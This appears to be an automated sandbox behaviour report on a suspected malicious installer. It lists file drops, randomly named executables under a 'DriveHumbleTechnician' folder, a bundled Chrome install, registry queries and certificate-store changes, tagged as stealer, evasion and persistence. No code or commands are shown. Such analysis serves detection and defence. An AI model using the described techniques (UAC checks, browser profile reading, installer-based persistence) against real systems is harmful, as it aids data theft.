File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\af.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\hi\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\ka\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\de\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\en\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\ca\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\iw\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\dasherSettingSchema.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\chrome_elf.dll C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\fa\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\ko.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\130.0.6723.117\Installer\setup.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\hr\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\lv\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\vi.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\updater.log.old C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\hr.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\pl.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\v8_context_snapshot.bin C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\VisualElements\SmallLogoDev.png C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\ro.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\en_GB\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\gu\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\CHROME.PACKED.7Z C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\ml.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\VisualElements\SmallLogo.png C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\chrome_wer.dll C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\libEGL.dll C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\th\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\fr\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\cs\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\nl\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\prefs.json C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{E3535876-7CDF-474D-9B78-FC4A9ADEFD7C} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF6D3.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57f59d.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57f59b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57f59b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe N/A
N/A N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe N/A
N/A N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\130.0.6723.117\elevation_service.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a47b29fbd6f9c3720000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a47b29fb0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a47b29fb000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da47b29fb000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a47b29fb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings\neajdppkdcdipfabeoofebfddakdcjhd = "0AB8235BCF6CD735C78C38B85B74BEFD18914286EE2CB6C8038950115A0C23E6" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\BLBeacon\state = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\safebrowsing.incidents_sent = "11D90B4FA6AC8561C53193FDB47118B189FF07225839B8C273C101158536E52A" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}\dr = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings\nmmhkkegccagdldgiimedpiccmgmieda = "15661F2A5350E33D1EC92EADAAB18D5963EE677331978A519CFDD7F840F1427B" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\homepage = "25EE4AF1A4E3E8B7C52843EE34DA8A06CFE7153CE3D50E41FADD45EFD8A82748" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Network C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0" C:\Windows\System32\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings\nkeimhogjdpnpccoofpliimaahmaaome = "2620DD8285D5404531C8A1B8468B85D0CDBC44620B60251D4E1DDF3505DB9341" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\BLBeacon C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\StabilityMetrics C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\UsageStatsInSample = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133763974488585191" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Update C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi = "258222BC21D8A8510EEFE793694EBBE376F3DA1D571ED72447E2E852F32792E9" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\BLBeacon C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}\lastrun = "13376397445619412" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\google.services.account_id = "C9C65E4D3304587A839579821F12334783B12665EA41DD2C34F3D92FECCA9D86" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\session.startup_urls = "135559D901D1DD01CD7AECDCA2C80A955C7C514E1738F456157E182DF41FDEA9" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google C:\Program Files\Google\Chrome\Application\chrome.exe N/A
